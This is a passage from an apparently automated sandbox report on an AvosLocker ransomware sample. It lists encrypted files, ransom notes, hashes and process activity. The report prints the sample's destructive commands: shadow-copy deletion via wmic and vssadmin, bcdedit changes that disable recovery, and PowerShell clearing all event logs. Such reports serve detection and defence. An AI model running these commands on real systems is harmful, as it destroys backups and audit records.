/f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1209476241.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\Users\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2716-687-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2716-700-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2716-740-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/2716-1422-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2716-1767-0x00000000024B0000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c9734dd629f10b384479160ed4046063
SHA1 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA256 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVFLMG0ZOJDG33R86VBG.temp

MD5 c9734dd629f10b384479160ed4046063
SHA1 4d98ef5d3cb709eaa6683d6c09c1c2317362b06b
SHA256 76c16a2766e8af4b622e6e5848a261ed37a9ff758c528037f5b15e5eceb60ce1
SHA512 144a8f3211ec7ca625e5f958a0caea2e7024f58a85e1cd57d0f32466b104e41cbcd97ce748f3d077bbc54bb9e6826aa788843f53043fe6f4f54057a9d1ed2b17

memory/2900-24595-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2900-24597-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2900-24596-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2900-24598-0x0000000002500000-0x0000000002580000-memory.dmp

memory/2900-24599-0x0000000002500000-0x0000000002580000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2900-24601-0x0000000002500000-0x0000000002580000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1209476241.png

MD5 1524411f3d6138062f1bd5ab5d31338c
SHA1 49292962485c61cf2307b139b494da8512a52916
SHA256 d5e0fa9b4d02e1225dff1af879333969f9245e8a2820a1635130ffccb6b27dd2
SHA512 ec8346d0c0b5ebcf171eb8aaf02d41ad3785f1a6c39c9e16ec9c84fd857ccd8d59f4ab69df5c1a919eb1248af2929b61cd9ca7292091ffb09352234b6c3c4c55

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-16 09:12

Reported

2023-03-16 09:14

Platform

win10v2004-20230220-en

Max time kernel

78s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File renamed | C:\Users\Admin\Pictures\ExpandDebug.crw => C:\Users\Admin\Pictures\ExpandDebug.crw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\GroupDismount.crw => C:\Users\Admin\Pictures\GroupDismount.crw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\HideShow.crw => C:\Users\Admin\Pictures\HideShow.crw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\TraceBackup.png => C:\Users\Admin\Pictures\TraceBackup.png.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File renamed | C:\Users\Admin\Pictures\UnprotectEdit.crw => C:\Users\Admin\Pictures\UnprotectEdit.crw.avos2 | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\80944880.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-il\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\share.svg | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessDemoR_BypassTrial365-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\ja.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\Roseland.exe | N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview-hover.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-16_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\an\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Windows Media Player\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\meta\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerview.x-none.msi.16.x-none.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\System\msadc\en-US\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\LanguageModel\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 1480 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 3624 wrote to memory of 9584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3624 wrote to memory of 9584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1020 wrote to memory of 9652 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 9652 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1168 wrote to memory of 7900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1168 wrote to memory of 7900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1296 wrote to memory of 10380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1296 wrote to memory of 10380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1156 wrote to memory of 2796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1156 wrote to memory of 2796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1480 wrote to memory of 20972 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1480 wrote to memory of 20972 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20972 wrote to memory of 19760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20972 wrote to memory of 19760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 20972 wrote to memory of 19980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 20972 wrote to memory of 19980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

